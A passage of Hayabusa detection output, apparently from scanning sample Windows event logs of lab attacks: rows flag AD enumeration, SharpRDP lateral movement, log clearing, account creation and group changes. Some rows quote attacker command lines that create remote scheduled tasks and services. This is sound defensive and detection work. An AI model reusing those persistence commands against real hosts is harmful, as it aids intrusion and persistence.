0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.825 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:52.909 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:11.977 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:11.981 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.004 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.005 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.005 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 21:22:31.163 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-09 21:25:41.773 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-09 21:29:17.982 +00:00,jump01.offsec.lan,4688,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-List all Service Principal Names (SPN).evtx +2020-07-09 21:29:17.982 +00:00,jump01.offsec.lan,4688,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4688-SPN added to an account.evtx +2020-07-09 22:00:11.181 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:17.584 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:27.033 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:31.217 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:40.413 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:45.589 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:48.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:58.550 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:01:03.898 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:01:06.427 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:05:58.373 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:06:07.487 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 10:20:34.910 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 10:20:35.589 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 10:20:37.637 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 10:20:37.637 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 17:16:42.576 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:16:42.592 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:16:50.984 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:17:49.788 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 17:17:49.788 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 17:18:01.228 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 21:09:03.249 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx +2020-07-11 21:09:03.249 +00:00,jump01.offsec.lan,4688,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx +2020-07-11 21:38:17.351 +00:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: 2020-07-11T21:38:17 OFFSEC\lambda-user 2020-07-11T15:20:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\WINDOWS\Temp\MpCmdRun.bat S-1-5-18 LeastPrivilege | User: admmig | LID: 0x3246775",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-11 21:38:17.445 +00:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-11 21:38:17.445 +00:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-11 21:46:39.786 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-11 21:46:39.786 +00:00,jump01.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-11 21:49:56.318 +00:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-11 21:50:07.213 +00:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 05:10:08.442 +00:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 05:10:08.442 +00:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 05:12:58.295 +00:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 05:14:30.976 +00:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 05:14:30.976 +00:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 05:17:23.107 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 05:17:23.107 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 05:19:54.561 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.561 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.564 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.564 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.566 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.566 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.568 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.568 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.570 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.570 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.572 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.572 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.574 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.574 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.576 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.576 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.578 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 